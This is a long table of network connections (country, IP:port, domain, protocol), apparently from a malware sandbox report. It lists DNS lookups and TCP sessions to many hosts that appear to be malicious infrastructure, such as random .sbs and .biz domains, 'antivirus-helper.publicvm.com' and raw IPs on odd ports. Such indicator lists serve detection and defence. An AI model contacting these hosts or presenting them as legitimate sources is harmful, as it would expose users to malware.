| HK | 43.132.13.252:9000 | 43.132.13.252 | tcp |
| CN | 122.51.183.116:1234 | tcp | |
| LK | 192.248.13.186:80 | 192.248.13.186 | tcp |
| CN | 101.71.255.146:8195 | tcp | |
| US | 8.8.8.8:53 | perfectperu.com | udp |
| US | 8.8.8.8:53 | dz0nhlj1q8ac3.cloudfront.net | udp |
| NL | 4.180.120.64:8000 | 4.180.120.64 | tcp |
| IE | 52.92.20.105:443 | dctdownload.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | hnjgdl.geps.glodon.com | udp |
| IE | 52.218.101.122:443 | dctdownload.s3.amazonaws.com | tcp |
| CN | 61.131.3.86:9991 | tcp | |
| CN | 39.108.237.194:80 | tcp | |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.201.169.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.117.12.49.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.91.86.99.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 132.249.42.81.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.244.41.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.174.111.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 61.238.158.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.45.161.203.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.1.92.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.20.92.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.83.233.99.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.16.11.76.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.227.165.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.237.23.67.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.97.26.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.47.190.67.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.184.154.165.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.115.54.198.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.72.77.219.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.252.1.121.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.44.0.136.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.166.31.122.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.162.34.144.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.120.180.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.101.218.52.in-addr.arpa | udp |
| BG | 88.213.212.10:80 | monastery.mlnk.net | tcp |
| DE | 38.242.241.140:80 | tcp | |
| CN | 113.219.177.95:8087 | tcp | |
| US | 50.116.92.169:443 | csg-app.com | tcp |
| HK | 47.79.66.210:80 | a15aaa1.oss-cn-hongkong.aliyuncs.com | tcp |
| CA | 184.145.33.5:80 | 184.145.33.5 | tcp |
| US | 8.8.8.8:53 | sfa.com.ar | udp |
| US | 8.8.8.8:53 | d.kpzip.com | udp |
| CN | 59.110.104.183:8888 | hnjgdl.geps.glodon.com | tcp |
| US | 50.116.92.169:443 | csg-app.com | tcp |
| US | 50.116.92.169:443 | csg-app.com | tcp |
| IE | 52.218.37.1:443 | dctdownload.s3.amazonaws.com | tcp |
| IE | 52.218.101.122:443 | dctdownload.s3.amazonaws.com | tcp |
| CN | 119.91.25.19:8888 | tcp | |
| US | 8.8.8.8:53 | 21.210.18.75.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.212.213.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.33.145.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.13.248.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.92.116.50.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.66.79.47.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.118.56.146.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 236.43.150.166.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 252.13.132.43.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.54.242.178.in-addr.arpa | udp |
| NL | 194.26.192.76:8080 | 194.26.192.76 | tcp |
| US | 67.213.59.251:80 | 67.213.59.251 | tcp |
| US | 190.61.250.130:80 | sfa.com.ar | tcp |
| CN | 36.250.242.248:80 | d.kpzip.com | tcp |
| DO | 181.36.153.151:81 | 181.36.153.151 | tcp |
| CN | 211.91.65.232:80 | src1.minibai.com | tcp |
| IN | 103.117.156.102:80 | 103.117.156.102 | tcp |
| CN | 112.124.28.233:5566 | tcp | |
| FR | 52.222.153.187:443 | dz0nhlj1q8ac3.cloudfront.net | tcp |
| US | 8.8.8.8:53 | twizthash.net | udp |
| HK | 103.43.18.71:88 | 103.43.18.71 | tcp |
| AR | 200.58.120.6:80 | perfectperu.com | tcp |
| NL | 203.161.45.11:443 | cdn-downloads-now.xyz | tcp |
| US | 8.8.8.8:53 | 76.192.26.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 251.59.213.67.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.250.61.190.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.153.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.37.218.52.in-addr.arpa | udp |
| RU | 195.46.176.2:80 | 195.46.176.2 | tcp |
| RU | 176.111.174.138:443 | tcp | |
| IE | 52.218.108.50:443 | dctdownload.s3.amazonaws.com | tcp |
| IE | 52.218.37.1:443 | dctdownload.s3.amazonaws.com | tcp |
| RU | 185.215.113.66:80 | twizthash.net | tcp |
| US | 8.8.8.8:53 | 151.153.36.181.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 102.156.117.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.18.43.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.93.155.43.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.120.58.200.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.176.46.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.108.218.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.113.215.185.in-addr.arpa | udp |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| FR | 52.222.153.24:443 | dz0nhlj1q8ac3.cloudfront.net | tcp |
| US | 8.8.8.8:53 | hallowed-noisy.sbs | udp |
| US | 8.8.8.8:53 | plastic-mitten.sbs | udp |
| US | 8.8.8.8:53 | looky-marked.sbs | udp |
| US | 8.8.8.8:53 | wrench-creter.sbs | udp |
| US | 8.8.8.8:53 | slam-whipp.sbs | udp |
| US | 8.8.8.8:53 | record-envyp.sbs | udp |
| US | 8.8.8.8:53 | copper-replace.sbs | udp |
| BG | 130.185.193.208:8080 | 130.185.193.208 | tcp |
| TH | 154.197.69.165:443 | tcp | |
| US | 8.8.8.8:53 | savvy-steereo.sbs | udp |
| US | 8.8.8.8:53 | 226.190.62.47.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.153.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.148.83.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | preside-comforter.sbs | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| RU | 176.111.174.138:443 | tcp | |
| US | 8.8.8.8:53 | www.saf-oil.ru | udp |
| IE | 52.218.108.50:443 | dctdownload.s3.amazonaws.com | tcp |
| IE | 52.92.35.81:443 | dctdownload.s3.amazonaws.com | tcp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| US | 13.58.157.220:10640 | tcp | |
| US | 8.8.8.8:53 | 208.193.185.130.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 165.69.197.154.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.35.92.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.143.214.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | shell.dimitrimedia.com | udp |
| FR | 52.222.153.112:443 | dz0nhlj1q8ac3.cloudfront.net | tcp |
| US | 144.34.162.13:3333 | tcp | |
| US | 8.8.8.8:53 | marshal-zhukov.com | udp |
| US | 144.172.71.105:1338 | 144.172.71.105 | tcp |
| RU | 87.236.16.222:443 | www.saf-oil.ru | tcp |
| CN | 101.126.11.168:80 | tcp | |
| CN | 120.25.163.165:8080 | tcp | |
| IE | 52.92.0.153:443 | dctdownload.s3.amazonaws.com | tcp |
| IE | 52.92.35.81:443 | dctdownload.s3.amazonaws.com | tcp |
| CN | 123.132.224.187:14417 | tcp | |
| DE | 172.105.66.118:80 | shell.dimitrimedia.com | tcp |
| US | 172.67.160.80:443 | marshal-zhukov.com | tcp |
| RU | 176.113.115.37:80 | 176.113.115.37 | tcp |
| FR | 52.222.153.25:443 | dz0nhlj1q8ac3.cloudfront.net | tcp |
| US | 24.93.22.147:8081 | 24.93.22.147 | tcp |
| IE | 52.92.0.153:443 | dctdownload.s3.amazonaws.com | tcp |
| IE | 3.5.64.4:443 | dctdownload.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | unicorpbrunei.com | udp |
| DE | 172.105.66.118:8080 | shell.dimitrimedia.com | tcp |
| KW | 178.61.160.6:5001 | 178.61.160.6 | tcp |
| US | 8.8.8.8:53 | rddissisifigifidi.net | udp |
| US | 8.8.8.8:53 | 112.153.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.0.92.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.66.105.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 222.16.236.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.71.172.144.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.160.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.115.113.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.153.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.64.5.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.22.93.24.in-addr.arpa | udp |
| RU | 185.215.113.66:80 | rddissisifigifidi.net | tcp |
| IE | 52.92.1.41:443 | dctdownload.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | defgyma.com | udp |
| IE | 3.5.64.4:443 | dctdownload.s3.amazonaws.com | tcp |
| IN | 103.14.122.111:80 | unicorpbrunei.com | tcp |
| US | 8.8.8.8:53 | ldcdn.ldmnq.com | udp |
| US | 8.8.8.8:53 | a12xxx1.oss-cn-hongkong.aliyuncs.com | udp |
| HK | 156.245.12.220:8000 | 156.245.12.220 | tcp |
| GB | 163.181.154.238:443 | ldcdn.ldmnq.com | tcp |
| HK | 47.79.66.205:80 | a12xxx1.oss-cn-hongkong.aliyuncs.com | tcp |
| CN | 124.70.140.100:80 | tcp | |
| AZ | 185.18.245.58:80 | defgyma.com | tcp |
| US | 8.8.8.8:53 | 6.160.61.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.122.14.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a19ccc1.oss-cn-hongkong.aliyuncs.com | udp |
| US | 8.8.8.8:53 | 220.12.245.156.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.154.181.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.66.79.47.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.245.18.185.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | rl.ammyy.com | udp |
| NL | 188.42.129.148:80 | rl.ammyy.com | tcp |
| US | 8.8.8.8:53 | www.grupodulcemar.pe | udp |
| DE | 136.243.104.235:443 | tcp | |
| RU | 176.113.115.33:80 | 176.113.115.33 | tcp |
| US | 8.8.8.8:53 | kiemthehuyenlong.com | udp |
| US | 8.8.8.8:53 | 148.129.42.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.104.243.136.in-addr.arpa | udp |
| N/A | 255.255.255.255:9999 | udp | |
| HK | 47.79.66.211:80 | a19ccc1.oss-cn-hongkong.aliyuncs.com | tcp |
| US | 8.8.8.8:53 | cfs7.blog.daum.net | udp |
| US | 8.8.8.8:53 | www.xn--on3b15m2lco2u.com | udp |
| US | 8.8.8.8:53 | 33.115.113.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | adf6.adf6.com | udp |
| PE | 161.132.57.101:80 | www.grupodulcemar.pe | tcp |
| VN | 103.163.214.66:80 | kiemthehuyenlong.com | tcp |
| HK | 156.245.12.57:8000 | 156.245.12.57 | tcp |
| RU | 176.111.174.138:443 | tcp | |
| KR | 152.67.212.187:443 | tcp | |
| US | 8.8.8.8:53 | 211.66.79.47.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.57.132.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.214.163.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.12.245.156.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.212.67.152.in-addr.arpa | udp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 104.21.67.89:80 | adf6.adf6.com | tcp |
| KR | 221.139.49.8:80 | www.xn--on3b15m2lco2u.com | tcp |
| US | 8.8.8.8:53 | down.qqfarmer.com.cn | udp |
| RU | 176.111.174.138:443 | tcp | |
| US | 8.8.8.8:53 | 89.67.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.49.139.221.in-addr.arpa | udp |
| US | 8.8.8.8:53 | week-dictionary.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | dare-curbys.biz | udp |
| US | 172.67.181.44:443 | dare-curbys.biz | tcp |
| US | 147.185.221.22:12466 | week-dictionary.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | www.netsolution.it | udp |
| US | 8.8.8.8:53 | goodlabel.cn | udp |
| BR | 187.59.102.238:9090 | 187.59.102.238 | tcp |
| KR | 121.53.218.30:80 | cfs7.blog.daum.net | tcp |
| CN | 123.60.59.48:80 | tcp | |
| US | 8.8.8.8:53 | covery-mover.biz | udp |
| US | 172.67.206.64:443 | covery-mover.biz | tcp |
| RS | 79.101.0.33:80 | 79.101.0.33 | tcp |
| US | 8.8.8.8:53 | post-to-me.com | udp |
| US | 8.8.8.8:53 | 44.181.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.102.59.187.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.218.53.121.in-addr.arpa | udp |
| CN | 58.218.215.167:80 | down.qqfarmer.com.cn | tcp |
| US | 104.21.56.70:443 | post-to-me.com | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | 33.0.101.79.in-addr.arpa | udp |
| RU | 176.111.174.138:443 | tcp | |
| RU | 176.111.174.140:443 | tcp | |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| IL | 195.60.232.6:100 | 195.60.232.6 | tcp |
| VE | 167.250.49.155:80 | 167.250.49.155 | tcp |
| US | 8.8.8.8:53 | dow.andylab.cn | udp |
| US | 172.67.162.65:443 | se-blurry.biz | tcp |
| IT | 185.81.0.56:80 | www.netsolution.it | tcp |
| CN | 175.27.229.2:80 | goodlabel.cn | tcp |
| HK | 134.122.129.18:80 | 134.122.129.18 | tcp |
| CN | 61.182.69.190:11111 | tcp | |
| SE | 94.255.218.185:80 | 94.255.218.185 | tcp |
| US | 170.55.7.234:80 | 170.55.7.234 | tcp |
| CN | 122.51.183.116:443 | tcp | |
| ID | 103.123.98.86:8082 | 103.123.98.86 | tcp |
| CN | 139.159.155.204:81 | tcp | |
| JP | 111.217.175.54:80 | 111.217.175.54 | tcp |
| US | 8.8.8.8:53 | ad.adf6.com | udp |
| US | 192.74.234.120:80 | ad.adf6.com | tcp |
| CN | 116.131.57.65:80 | dow.andylab.cn | tcp |
| KR | 112.217.207.130:80 | 112.217.207.130 | tcp |
| ES | 217.125.11.90:8080 | 217.125.11.90 | tcp |
| US | 8.8.8.8:53 | host-95-255-114-11.business.telecomitalia.it | udp |
| IT | 95.255.114.11:80 | host-95-255-114-11.business.telecomitalia.it | tcp |
| DE | 217.92.214.15:8088 | 217.92.214.15 | tcp |
| US | 8.8.8.8:53 | 70.56.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.174.111.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.162.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.232.60.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.0.81.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.49.250.167.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.218.255.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.129.122.134.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.7.55.170.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.98.123.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.234.74.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.11.125.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.114.255.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.207.217.112.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.214.92.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| US | 172.67.136.167:443 | zinc-sneark.biz | tcp |
| US | 8.8.8.8:53 | 64.206.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.175.217.111.in-addr.arpa | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| RU | 176.111.174.138:443 | tcp | |
| US | 8.8.8.8:53 | 167.136.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| GB | 142.250.200.3:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | www.maan2u.com | udp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| MY | 103.82.231.117:443 | www.maan2u.com | tcp |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| US | 172.67.153.96:443 | dwell-exclaim.biz | tcp |
| US | 172.67.162.65:443 | se-blurry.biz | tcp |
| RU | 176.111.174.138:443 | tcp | |
| US | 8.8.8.8:53 | 96.153.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.231.82.103.in-addr.arpa | udp |
| KR | 152.67.212.187:443 | tcp | |
| MY | 103.82.231.117:443 | www.maan2u.com | tcp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | antivirus-helper.publicvm.com | udp |
| US | 8.8.8.8:53 | mohibkal.publicvm.com | udp |
| US | 172.67.136.167:443 | zinc-sneark.biz | tcp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| DE | 136.243.111.71:741 | antivirus-helper.publicvm.com | tcp |
| US | 104.21.96.55:443 | formy-spill.biz | tcp |
| NL | 82.168.179.78:1978 | mohibkal.publicvm.com | tcp |
| US | 8.8.8.8:53 | 71.111.243.136.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.96.21.104.in-addr.arpa | udp |
| NL | 81.161.238.172:8705 | tcp | |
| CN | 116.169.181.197:80 | d.kpzip.com | tcp |
| CN | 202.97.231.78:80 | src1.minibai.com | tcp |
| US | 8.8.8.8:53 | soportegira.net | udp |
| US | 8.8.8.8:53 | 123.ywxww.net | udp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 8.8.8.8:53 | download.suxiazai.com | udp |
| US | 8.8.8.8:53 | funletters.net | udp |
| US | 8.8.8.8:53 | jtpdev.co.uk | udp |
| US | 8.8.8.8:53 | cfs10.blog.daum.net | udp |
| US | 8.8.8.8:53 | down10d.zol.com.cn | udp |
| US | 8.8.8.8:53 | pub-37d3986658af451c9d52bb9f482b3e2d.r2.dev | udp |
| US | 8.8.8.8:53 | cfs5.tistory.com | udp |
| US | 8.8.8.8:53 | eoufaoeuhoauengi.su | udp |
| US | 8.8.8.8:53 | cdn.ly.9377.com | udp |
| US | 8.8.8.8:53 | data.discuz.mobi | udp |
| US | 8.8.8.8:53 | a23uuu1.oss-cn-hongkong.aliyuncs.com | udp |
| US | 8.8.8.8:53 | cat.xiaoshabi.nl | udp |
| RU | 185.215.113.36:80 | 185.215.113.36 | tcp |
| CN | 114.55.106.136:80 | tcp | |
| ES | 94.76.156.101:280 | 94.76.156.101 | tcp |
| KR | 218.147.147.172:80 | 218.147.147.172 | tcp |
| CN | 47.104.173.216:8082 | tcp | |
| CN | 39.103.217.92:80 | tcp | |
| DE | 172.105.66.118:80 | shell.dimitrimedia.com | tcp |
| RU | 89.175.186.155:80 | 89.175.186.155 | tcp |
| SG | 168.138.162.78:80 | 168.138.162.78 | tcp |
| CN | 47.104.173.216:8082 | tcp | |
| FR | 109.210.138.197:80 | 109.210.138.197 | tcp |
| US | 172.67.206.64:443 | covery-mover.biz | tcp |
| CN | 8.134.12.90:80 | tcp | |
| RU | 77.72.254.210:17017 | 77.72.254.210 | tcp |
| DO | 181.36.153.151:80 | 181.36.153.151 | tcp |
| CN | 60.29.43.10:8072 | tcp | |
| CN | 222.244.110.238:8089 | tcp | |
| AU | 80.249.6.118:8084 | 80.249.6.118 | tcp |
| VN | 113.160.158.236:80 | 113.160.158.236 | tcp |
| US | 141.155.36.213:41790 | 141.155.36.213 | tcp |
| KR | 146.56.118.137:80 | 146.56.118.137 | tcp |
| CN | 47.120.46.210:80 | tcp | |
| RU | 176.111.174.138:8000 | 176.111.174.138 | tcp |
| CN | 112.27.189.32:8090 | tcp | |
| US | 172.67.153.96:443 | dwell-exclaim.biz | tcp |
| RU | 176.111.174.138:443 | tcp | |
| US | 98.109.126.66:41798 | 98.109.126.66 | tcp |
| CN | 121.40.100.23:12616 | tcp | |
| CN | 115.28.26.10:8080 | tcp | |
| IE | 185.166.142.23:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | 197.138.210.109.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.156.76.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.186.175.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.254.72.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.36.155.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 236.158.160.113.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.162.138.168.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.6.249.80.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.147.147.218.in-addr.arpa | udp |
| GB | 91.238.160.241:443 | jtpdev.co.uk | tcp |
| ES | 83.175.202.178:80 | soportegira.net | tcp |
| US | 162.159.140.237:443 | pub-37d3986658af451c9d52bb9f482b3e2d.r2.dev | tcp |
| US | 208.122.221.162:80 | funletters.net | tcp |
| RU | 185.215.113.66:80 | eoufaoeuhoauengi.su | tcp |
| GB | 79.133.176.219:80 | cdn.ly.9377.com | tcp |
| CN | 60.191.208.187:820 | 123.ywxww.net | tcp |
| CN | 122.143.2.98:80 | down10d.zol.com.cn | tcp |
| KR | 211.231.99.68:80 | cfs5.tistory.com | tcp |
| US | 8.8.8.8:53 | 139520.aioc.qbgxl.com | udp |
| US | 20.83.148.22:80 | tcp | |
| CN | 125.33.229.165:8085 | tcp | |
| US | 65.75.209.59:80 | cat.xiaoshabi.nl | tcp |
| HK | 47.79.66.210:80 | a23uuu1.oss-cn-hongkong.aliyuncs.com | tcp |
| CN | 121.4.173.197:443 | data.discuz.mobi | tcp |
| KR | 121.53.201.236:80 | cfs5.tistory.com | tcp |
| RU | 92.127.156.174:8880 | 92.127.156.174 | tcp |
| CN | 117.161.176.120:80 | download.suxiazai.com | tcp |
| HK | 45.15.9.44:80 | 45.15.9.44 | tcp |
| DE | 172.105.66.118:8080 | shell.dimitrimedia.com | tcp |
| US | 8.8.8.8:53 | 232.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.142.166.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.126.109.98.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.140.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.160.238.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 219.176.133.79.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.202.175.83.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 162.221.122.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.99.231.211.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.156.127.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.209.75.65.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 236.201.53.121.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.9.15.45.in-addr.arpa | udp |
| SE | 185.130.45.176:80 | 185.130.45.176 | tcp |
| US | 8.8.8.8:53 | update.vlnguba.com | udp |
| US | 104.21.96.55:443 | formy-spill.biz | tcp |
| CN | 180.167.115.186:8011 | tcp | |
| CN | 61.160.195.64:80 | 139520.aioc.qbgxl.com | tcp |
| CN | 203.2.65.29:8088 | tcp | |
| US | 8.8.8.8:53 | media.githubusercontent.com | udp |
| US | 8.8.8.8:53 | paonancs.cn | udp |
| CN | 121.40.100.23:12616 | tcp | |
| US | 8.8.8.8:53 | 176.45.130.185.in-addr.arpa | udp |
| PK | 116.58.62.74:80 | 116.58.62.74 | tcp |
| VN | 103.145.254.62:80 | update.vlnguba.com | tcp |
| US | 209.141.35.225:80 | 209.141.35.225 | tcp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | 225.35.141.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.62.58.116.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.254.145.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | download.haozip.com | udp |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| US | 104.21.35.246:443 | print-vexer.biz | tcp |
| US | 8.8.8.8:53 | 246.35.21.104.in-addr.arpa | udp |
| PT | 188.250.120.10:80 | 188.250.120.10 | tcp |
| IN | 122.170.110.131:9105 | 122.170.110.131 | tcp |
| US | 8.8.8.8:53 | file.blackint3.com | udp |
| CN | 58.218.215.160:80 | down.qqfarmer.com.cn | tcp |
| MA | 102.53.15.54:80 | 102.53.15.54 | tcp |
| US | 185.199.108.133:443 | media.githubusercontent.com | tcp |
| KR | 125.186.91.61:80 | 125.186.91.61 | tcp |
| US | 16.182.71.185:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 38.148.246.248:80 | paonancs.cn | tcp |
| RU | 176.113.115.37:80 | 176.113.115.37 | tcp |
| RU | 176.111.174.138:443 | tcp | |
| CN | 61.170.80.227:80 | download.haozip.com | tcp |
| RU | 87.251.102.94:80 | 87.251.102.94 | tcp |
| US | 8.8.8.8:53 | 360down7.miiyun.cn | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | 10.120.250.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.15.53.102.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.71.182.16.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.110.170.122.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 248.246.148.38.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 61.91.186.125.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.102.251.87.in-addr.arpa | udp |
| US | 103.130.147.211:80 | 103.130.147.211 | tcp |
| CN | 117.50.194.20:80 | tcp | |
| CN | 101.200.220.118:8090 | tcp | |
| US | 8.8.8.8:53 | pb.agnt.ru | udp |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| DE | 188.245.87.202:443 | tcp | |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| US | 172.67.181.44:443 | dare-curbys.biz | tcp |
| US | 8.8.8.8:53 | 211.147.130.103.in-addr.arpa | udp |
| US | 172.67.160.80:443 | marshal-zhukov.com | tcp |
| US | 8.8.8.8:53 | utorrent-backup-server4.top | udp |
| CN | 182.149.206.216:88 | file.blackint3.com | tcp |
| US | 8.8.8.8:53 | znrq.zifwxq.cn | udp |
| RU | 185.215.113.36:80 | 185.215.113.36 | tcp |
| CN | 123.6.40.248:80 | dow.andylab.cn | tcp |
| US | 54.231.233.161:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | bafybeicnmx2fcaolinpdaiqjo7hgsourg3qzaxf57psdrbqic4qrm4pf3i.ipfs.dweb.link | udp |
| CN | 218.12.76.159:80 | znrq.zifwxq.cn | tcp |
| CN | 121.43.104.75:81 | tcp | |
| HK | 219.73.22.64:8084 | 219.73.22.64 | tcp |
| RU | 45.90.34.133:443 | pb.agnt.ru | tcp |
| ES | 178.156.109.69:81 | 178.156.109.69 | tcp |
| US | 8.8.8.8:53 | 69.109.156.178.in-addr.arpa | udp |
